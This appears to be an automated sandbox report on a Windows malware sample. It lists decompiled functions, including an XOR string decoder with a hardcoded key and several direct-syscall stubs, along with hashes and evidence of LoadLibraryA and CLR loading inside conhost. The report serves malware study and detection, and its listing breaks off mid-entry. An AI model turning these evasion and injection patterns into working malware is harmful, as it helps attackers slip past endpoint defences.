                                          • Source File: 00000000.00000002.438450061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.438445677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.438454384.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.439170445.00000000005DD000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.439175059.00000000005DF000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1338.jbxd
                                          Similarity
                                          • API ID: memsetsprintf
                                          • String ID:
                                          • API String ID: 4041149307-0
                                          • Opcode ID: e611b780aaad0328af827d15d6967dd52fecb4441940ae0d59f41fbf170dceba
                                          • Instruction ID: d777382ce3b882984ebda8a8f82619b91bafcb5650684c5f5f4a19068a753fff
                                          • Opcode Fuzzy Hash: e611b780aaad0328af827d15d6967dd52fecb4441940ae0d59f41fbf170dceba
                                          • Instruction Fuzzy Hash: 53612C61702B504DEB508B27DC513DA76A8F749BC8F404176EE8CABB99EE3DCA44C784
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 27 401000-401045 call 401d68 30 401048-401050 27->30 31 4010b6-4010bb 30->31 32 401056-4010b4 30->32 32->30
                                          C-Code - Quality: 92%
                                          			E00401000(long long __rcx, long long __rdx, long long _a8, long long _a16) {
                                          				long long _v16;
                                          				signed int _v20;
                                          				void* _v32;
                                          				signed char* _v40;
                                          				signed int _t30;
                                          
                                          				_a8 = __rcx;
                                          				_a16 = __rdx;
                                          				L00401D68(); // executed
                                          				_v16 = _a16 + 1;
                                          				 *((char*)(_v16 + _a16)) = 0;
                                          				_v20 = 0;
                                          				while(1) {
                                          					_t30 = _v20;
                                          					if(_t30 >= _a16) {
                                          						break;
                                          					}
                                          					_v32 = _v16 + _v20;
                                          					_v40 = _a8 + _v20;
                                          					asm("cdq");
                                          					 *_v32 =  *_v40 ^  *("jfudwgjnolydsljwixclrghiuanoznnv" + _v20 % 0x20);
                                          					_v20 = _v20 + 1;
                                          				}
                                          				return _t30;
                                          			}

                                          Strings
                                          • jfudwgjnolydsljwixclrghiuanoznnv, xrefs: 00401098
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.438450061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.438445677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.438454384.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.439170445.00000000005DD000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.439175059.00000000005DF000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1338.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: jfudwgjnolydsljwixclrghiuanoznnv
                                          • API String ID: 0-2735995127
                                          • Opcode ID: 3395ddf03860ef85004415cfca38eec28906a0d9652ac0a9f3f7e601f17034a2
                                          • Instruction ID: e6fa5f20bfb036de9c56582362ae24f4d7d7e378f06df6b5650d7690213a9475
                                          • Opcode Fuzzy Hash: 3395ddf03860ef85004415cfca38eec28906a0d9652ac0a9f3f7e601f17034a2
                                          • Instruction Fuzzy Hash: D5214772B01A40DEEB04CBA9D8913AC3BF1EB4878DF00846AEE1DA7B58DA38D5518744
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 53%
                                          			_entry_() {
                                          				char _v12;
                                          				long long _v24;
                                          				long long _v40;
                                          				void* _t15;
                                          				void* _t16;
                                          
                                          				L00401D78();
                                          				L00401DA8();
                                          				L00401DB0();
                                          				L00401DB8();
                                          				_v24 = __imp____argc;
                                          				_v40 =  &_v12;
                                          				L00401DC0();
                                          				_v24 = __imp____argc;
                                          				_t15 = E00401B3F(_t16, _v24,  *__imp____argv,  *__imp___environ,  &_v12); // executed
                                          				L00401DC8(); // executed
                                          				return _t15;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.438450061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.438445677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.438454384.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.439170445.00000000005DD000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.439175059.00000000005DF000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1338.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7d8f7750eb13f6caf45962ae0b5c8e6f13678a6a96c502602ee71ae71581b22e
                                          • Instruction ID: edd8300733597f32f2ee978fe9ac9fff29ef75b1fe1343aac60f8b25cfeacb98
                                          • Opcode Fuzzy Hash: 7d8f7750eb13f6caf45962ae0b5c8e6f13678a6a96c502602ee71ae71581b22e
                                          • Instruction Fuzzy Hash: D2211964302E1488EB50DB27DC6179A67A4BB4DFC8F804937AE0DA73A5EE3CD601C744
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 50 401b3f-401bba call 401a48 call 4010c4 call 401adc
                                          C-Code - Quality: 43%
                                          			E00401B3F(void* __ecx, long long __rcx, long long __rdx, long long __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
                                          				intOrPtr _v12;
                                          				long long _v24;
                                          				intOrPtr _t14;
                                          
                                          				_a8 = __rcx;
                                          				_a16 = __rdx;
                                          				_a24 = __r8;
                                          				E00401A48(_a16, _a16, _a24);
                                          				_v24 = __imp____argc;
                                          				_t14 = E004010C4(_v24, _v24,  *__imp____argv); // executed
                                          				_v12 = _t14;
                                          				E00401ADC();
                                          				return _v12;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.438450061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.438445677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.438454384.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.439170445.00000000005DD000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.439175059.00000000005DF000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1338.jbxd
                                          Similarity
                                          • API ID: memsetsprintf
                                          • String ID:
                                          • API String ID: 4041149307-0
                                          • Opcode ID: 6764248a65143230f5fa14b63b02f471757a591320ddc2a527cf729df730e93a
                                          • Instruction ID: c571b51ad4df78ffad94752286725173bdee0121640128f8aec39e0708da8985
                                          • Opcode Fuzzy Hash: 6764248a65143230f5fa14b63b02f471757a591320ddc2a527cf729df730e93a
                                          • Instruction Fuzzy Hash: A601D266702B4889DB10DF66DC9139837A4B348BC8F004826AE0CA7B68DA38D511CB44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 40%
                                          			E00401946(long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
                                          				void* _t9;
                                          				signed long long _t11;   /* never assigned in this listing: the 40%-quality decompilation lost the register it carries */

                                          				/* Spill the four register arguments into the caller-provided shadow space (x64 convention). */
                                          				_a8 = __rcx;
                                          				_a16 = __rdx;
                                          				_a24 = __r8;
                                          				_a32 = __r9;
                                          				/* Call the shared helper E0040189D, then execute a raw syscall instruction from the
                                          				   sample's own image (base 0x00400000) rather than from ntdll: a direct-syscall stub. */
                                          				_t9 = E0040189D(_t11, __rcx);
                                          				asm("syscall");
                                          				return _t9;
                                          			}





                                          0x00401946
                                          0x0040194b
                                          0x00401950
                                          0x00401955
                                          0x00401963
                                          0x00401983
                                          0x00401985

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.438450061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.438445677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.438454384.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.439170445.00000000005DD000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.439175059.00000000005DF000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1338.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 754798f137a90f6bfbdd44437f8a26324e9b1650818ee4e69b83fa847c638778
                                          • Instruction ID: bb6dc57e5e6d00ac3b599d71d6b73205dd6ef6319e7c77c91fb469b109ff2e2c
                                          • Opcode Fuzzy Hash: 754798f137a90f6bfbdd44437f8a26324e9b1650818ee4e69b83fa847c638778
                                          • Instruction Fuzzy Hash: 55E0B676A08B80C18210EF55F04101AB7A4F7E87C4B14456EFAC817B19DF3CC1608E58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 40%
                                          			E004019C6(long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
                                          				void* _t9;
                                          				signed long long _t11;   /* never assigned in this listing (decompiler artifact) */

                                          				/* Same direct-syscall stub shape as the other E00401xxx functions:
                                          				   spill register args to the shadow space, call E0040189D, then raw syscall. */
                                          				_a8 = __rcx;
                                          				_a16 = __rdx;
                                          				_a24 = __r8;
                                          				_a32 = __r9;
                                          				_t9 = E0040189D(_t11, __rcx);
                                          				asm("syscall");
                                          				return _t9;
                                          			}





                                          0x004019c6
                                          0x004019cb
                                          0x004019d0
                                          0x004019d5
                                          0x004019e3
                                          0x00401a03
                                          0x00401a05

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.438450061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.438445677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.438454384.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.439170445.00000000005DD000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.439175059.00000000005DF000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1338.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 25404bc6cae4395c76a647428e86ba1968cc744108483a1f90b93c8c37301177
                                          • Instruction ID: 51c0650ffd9774f0920afbe4d4200ca525cd56899027ff788b3374880696bfbf
                                          • Opcode Fuzzy Hash: 25404bc6cae4395c76a647428e86ba1968cc744108483a1f90b93c8c37301177
                                          • Instruction Fuzzy Hash: 72E0B676608B80818210EF55F04001EB7A4F3E87C4F10465AFAC817B19CF38C1608E94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 40%
                                          			E00401A06(long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
                                          				void* _t9;
                                          				signed long long _t11;   /* never assigned in this listing (decompiler artifact) */

                                          				/* Same direct-syscall stub shape as the other E00401xxx functions:
                                          				   spill register args to the shadow space, call E0040189D, then raw syscall. */
                                          				_a8 = __rcx;
                                          				_a16 = __rdx;
                                          				_a24 = __r8;
                                          				_a32 = __r9;
                                          				_t9 = E0040189D(_t11, __rcx);
                                          				asm("syscall");
                                          				return _t9;
                                          			}





                                          0x00401a06
                                          0x00401a0b
                                          0x00401a10
                                          0x00401a15
                                          0x00401a23
                                          0x00401a43
                                          0x00401a45

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.438450061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.438445677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.438454384.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.439170445.00000000005DD000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.439175059.00000000005DF000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1338.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 998c96b42990e9022b0f6bd2447fd1769ed2e61415031125fd9c63c7b278971a
                                          • Instruction ID: 7424203293fca1d6e0b2c804dfbcc41db58a47c2ab58dfd9d4da75e1fe2057c2
                                          • Opcode Fuzzy Hash: 998c96b42990e9022b0f6bd2447fd1769ed2e61415031125fd9c63c7b278971a
                                          • Instruction Fuzzy Hash: C6E026B6A08B84928610EF56F04145AB7B4F7E87C4B54495AFAC857B19DF38C1608A54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 40%
                                          			E00401986(long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
                                          				void* _t9;
                                          				signed long long _t11;   /* never assigned in this listing (decompiler artifact) */

                                          				/* Same direct-syscall stub shape as the other E00401xxx functions:
                                          				   spill register args to the shadow space, call E0040189D, then raw syscall. */
                                          				_a8 = __rcx;
                                          				_a16 = __rdx;
                                          				_a24 = __r8;
                                          				_a32 = __r9;
                                          				_t9 = E0040189D(_t11, __rcx);
                                          				asm("syscall");
                                          				return _t9;
                                          			}





                                          0x00401986
                                          0x0040198b
                                          0x00401990
                                          0x00401995
                                          0x004019a3
                                          0x004019c3
                                          0x004019c5

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.438450061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.438445677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.438454384.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.439170445.00000000005DD000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.439175059.00000000005DF000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1338.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 36b211a9e4b3872e90f16f796bb24afd1074b322115fdfb724c17c4b9b879d27
                                          • Instruction ID: 605c79eb5aeb9a106a83d6f2d40d4c4e89cbfcc3187a819f05b45420c746b8d7
                                          • Opcode Fuzzy Hash: 36b211a9e4b3872e90f16f796bb24afd1074b322115fdfb724c17c4b9b879d27
                                          • Instruction Fuzzy Hash: 7EE0B67A608B80C28210EF55F04001EBBA5F7E87C4B10495AFAC817B2ACF38C1608B54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:11.6%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:42.9%
                                          Total number of Nodes:21
                                          Total number of Limit Nodes:2
                                          execution_graph (rendered graph; edge list omitted): nodes 2779de882af (LoadLibraryA), 2779de89106, 2779de8917c, 2779de89254 (LoadLibraryA), 2779de89269, 2779de8931d, 2779de882a2, 2779de883ba (LoadLibraryA), 2779de88eb2, 2779de88ef2 (CLRCreateInstance), 2779de890a9 (SafeArrayDestroy), 2779de890b2

                                          Control-flow Graph

                                          control_flow_graph (rendered graph with executed/not-executed colouring; edge list omitted): function 2779de89106, basic blocks 2779de89106-2779de894cf; API call LoadLibraryA; internal calls 2779de8a2de, 2779de8a85e, 2779de8a87e, 2779de8a492, 2779de8a352, 2779de884d2, 2779de882a2, 2779de883ba, 2779de8990e, 2779de88eb2, 2779de89d6a, 2779de88952, 2779de894d6, 2779de8a5e2
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.514767392.000002779DCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002779DCB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2779dcb0000_conhost.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 4981fcbef524a62066d347c258a4edd11de724e6c9263cf9e55c3275a19a809e
                                          • Instruction ID: 1cdbb2579aea5b7e8b2d53aadafa4764b1e38a7842d2e96e083102cac932efaa
                                          • Opcode Fuzzy Hash: 4981fcbef524a62066d347c258a4edd11de724e6c9263cf9e55c3275a19a809e
                                          • Instruction Fuzzy Hash: 3BC1933071E949DBEB5DEE2ADCD97B9B3D1FB98300F540129D64EC7186DB20F8528A81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph (rendered graph with executed/not-executed colouring; edge list omitted): function 7ff9f1c34b1e, basic blocks 7ff9f1c34b1e-7ff9f1c34f40; internal call 7ff9f1c34f64
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.521345881.00007FF9F1C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ff9f1c30000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8e.S
                                          • API String ID: 0-2745307131
                                          • Opcode ID: baa4e3368779fe7f0a916182baa8f7e601ddb0e08892da5c06e7de3b98da16d2
                                          • Instruction ID: 4950fc3cf34cd23ed1ec086585f7c5c5a1deadc4156b88a4be95184d60ba035b
                                          • Opcode Fuzzy Hash: baa4e3368779fe7f0a916182baa8f7e601ddb0e08892da5c06e7de3b98da16d2
                                          • Instruction Fuzzy Hash: 05D18330918A4D8FEBA8DF28C8467F937D1FF64301F54426ED85DC7295DB74A9818B82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph (rendered graph with executed/not-executed colouring; edge list omitted): function 7ff9f1c358ce, basic blocks 7ff9f1c358ce-7ff9f1c35cbc; internal call 7ff9f1c35ce0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.521345881.00007FF9F1C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ff9f1c30000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8e.S
                                          • API String ID: 0-2745307131
                                          • Opcode ID: a5ea20d36cde1d8697521c28d622a85dcaf4a91d177279fe75a0031972bbd5fb
                                          • Instruction ID: 285e110ec30dff752554d6255b3758f0bc606eaab4d7bf90c3244c61ccf8f8b2
                                          • Opcode Fuzzy Hash: a5ea20d36cde1d8697521c28d622a85dcaf4a91d177279fe75a0031972bbd5fb
                                          • Instruction Fuzzy Hash: 3ED18030918A4D8FEBA8DF28C8567F937D1FB54310F14826AD85DC7295CB74A9818B82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph (rendered graph with executed/not-executed colouring; edge list omitted): function 2779de894d6, basic blocks 2779de894d6-2779de8990a; no calls
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.514767392.000002779DCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002779DCB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2779dcb0000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 306a5ba0858ec8563746270e14812acecfee1f597f63ee0c00ea7117a0eb1afc
                                          • Instruction ID: 4a294c7c9121ec9f2abe414c11bb93fe294ff49c0ac9442f2a1932adcdcee7e8
                                          • Opcode Fuzzy Hash: 306a5ba0858ec8563746270e14812acecfee1f597f63ee0c00ea7117a0eb1afc
                                          • Instruction Fuzzy Hash: 34E14A3190CA488BDB59DF28C889BAAB7E1FF94310F14466EE94FCB155DF30E9468B41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.514767392.000002779DCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002779DCB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2779dcb0000_conhost.jbxd
                                          Similarity
                                          • API ID: ArrayCreateDestroyInstanceSafe
                                          • String ID:
                                          • API String ID: 3902440814-0
                                          • Opcode ID: 3d7ce29a3494d90a8d6d00d3dac55982f43ec50322358874c395b9073376e0d7
                                          • Instruction ID: d340458c94a7f1ea5a0a05db28bcb75cfe7d40792816f722c09352e0a5c1e55c
                                          • Opcode Fuzzy Hash: 3d7ce29a3494d90a8d6d00d3dac55982f43ec50322358874c395b9073376e0d7
                                          • Instruction Fuzzy Hash: B6817F3060CB488FD768EF29D888BA6B7E1FFA9301F004A6DD59FC7151EA31E5458B41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph (rendered graph with executed/not-executed colouring; edge list omitted): function 7ff9f1c3047b, basic blocks 7ff9f1c3047b-7ff9f1c308e4; internal calls 7ff9f1c30080, 7ff9f1c30088, 7ff9f1c300a0, 7ff9f1c300a8, 7ff9f1c300b8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.521345881.00007FF9F1C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ff9f1c30000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: jtZL$jtZL
                                          • API String ID: 0-4101839450
                                          • Opcode ID: 844e61cc06fe1d8eac80d14a6b2f4eb763a9abf7e181b14d0a02ed3a9dbb701b
                                          • Instruction ID: fd9dcdd4678b2d9b7f30625d2ff840c5a8990cfbf1122d537702ebff97555d74
                                          • Opcode Fuzzy Hash: 844e61cc06fe1d8eac80d14a6b2f4eb763a9abf7e181b14d0a02ed3a9dbb701b
                                          • Instruction Fuzzy Hash: 0BE19321A1CA494FF798F73880567B876D1EF56340F2100BAD41DC72E3DE6A7C958B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          [Control-flow graph rendering omitted; basic blocks 2779de883ba through 2779de884d0, calling LoadLibraryA and 2779de8a85e]
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.514767392.000002779DCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002779DCB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2779dcb0000_conhost.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                          • Instruction ID: f8d96b013e1aaa822f9adda4bcdc19b2453f2f7f4bc28e9f898205526400b0ce
                                          • Opcode Fuzzy Hash: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                          • Instruction Fuzzy Hash: 8131A63130CA4C8FEB58AA69E8893AA73D5FBD8310F001159ED4FC3286DD64ED0687C1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          [Control-flow graph rendering omitted; basic blocks 7ff9f1c312ad through 7ff9f1c315ef, with calls to 7ff9f1c30e60, 7ff9f1c315f0 and 7ff9f1c311f0]
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.521345881.00007FF9F1C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ff9f1c30000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: H.S
                                          • API String ID: 0-2311013185
                                          • Opcode ID: 3a41fbe276096f8d54006143753828332dcd2c3295041a66fafb116a534e6003
                                          • Instruction ID: 9419ade29d1f475a14dc55f3495434b2986e87c0f1ad45d98f6e6434a8af0eab
                                          • Opcode Fuzzy Hash: 3a41fbe276096f8d54006143753828332dcd2c3295041a66fafb116a534e6003
                                          • Instruction Fuzzy Hash: C2B12A21A2CE894FF795E72C44523B977D2EF86751F2800BAD41EC72D2DE69BC818781
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          [Control-flow graph rendering omitted; basic blocks 2779de882af through 2779de883b8, calling LoadLibraryA and 2779de8a85e]
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.514767392.000002779DCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002779DCB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2779dcb0000_conhost.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                          • Instruction ID: f0ddcca3729bb66bceb11a6b69ed794075257d2297a066a5c3ad9d3e2a60f66b
                                          • Opcode Fuzzy Hash: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                          • Instruction Fuzzy Hash: DA31613130CE488BDB59EA59A8997A973D6E7D8320F000259ED4FD72C9EE60ED468781
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          [Control-flow graph rendering omitted; basic blocks 2779de882a2 through 2779de883b8, calling LoadLibraryA and 2779de8a85e]
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.514767392.000002779DCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002779DCB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2779dcb0000_conhost.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                          • Instruction ID: b2b16fb6e519b4724366f214e056ad4fdc969f593b080949cd5cb3fe4634b56b
                                          • Opcode Fuzzy Hash: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                          • Instruction Fuzzy Hash: ADE0D83120CF0D5FF758D59EE88A7B676D8D795271F00002EEA49C2201E05598910391
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          [Control-flow graph rendering omitted; basic blocks 7ff9f1c300c0 through 7ff9f1c31110, with calls to 7ff9f1c31111 and 7ff9f1c31152]
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.521345881.00007FF9F1C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ff9f1c30000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1b90d3bd5668bcff010ef658bb8cb4e0d2d5170c730c703a08d8275b9783e218
                                          • Instruction ID: ea07a1d3ce4520380b5faa4dfe6d8d37a7eff1be64280b10a2c77fed8502c7e8
                                          • Opcode Fuzzy Hash: 1b90d3bd5668bcff010ef658bb8cb4e0d2d5170c730c703a08d8275b9783e218
                                          • Instruction Fuzzy Hash: 20717E31B1CA498FEB88FB6C9446779B7D2EF99701F14417AE05EC3292DE64BC428781
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.521345881.00007FF9F1C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ff9f1c30000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ab801ad01d85fa96d94dbcb9d2966a9bc878a7342849d13f8f1932fb6485ccb0
                                          • Instruction ID: 2b02b79f0a01fbabe31d58fe545b5b66e83f3e8723b3a84452ea8de3ef9a71b0
                                          • Opcode Fuzzy Hash: ab801ad01d85fa96d94dbcb9d2966a9bc878a7342849d13f8f1932fb6485ccb0
                                          • Instruction Fuzzy Hash: 8D618F31B1CA498FEB98EB6C94467B9B7D1EF99710F14417AE04DC32D2DE64AC828781
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.521345881.00007FF9F1C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ff9f1c30000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 29c997cca77a151d10f80b51c4b0b8b0ef586ee699da17bcdf684d3d17d16794
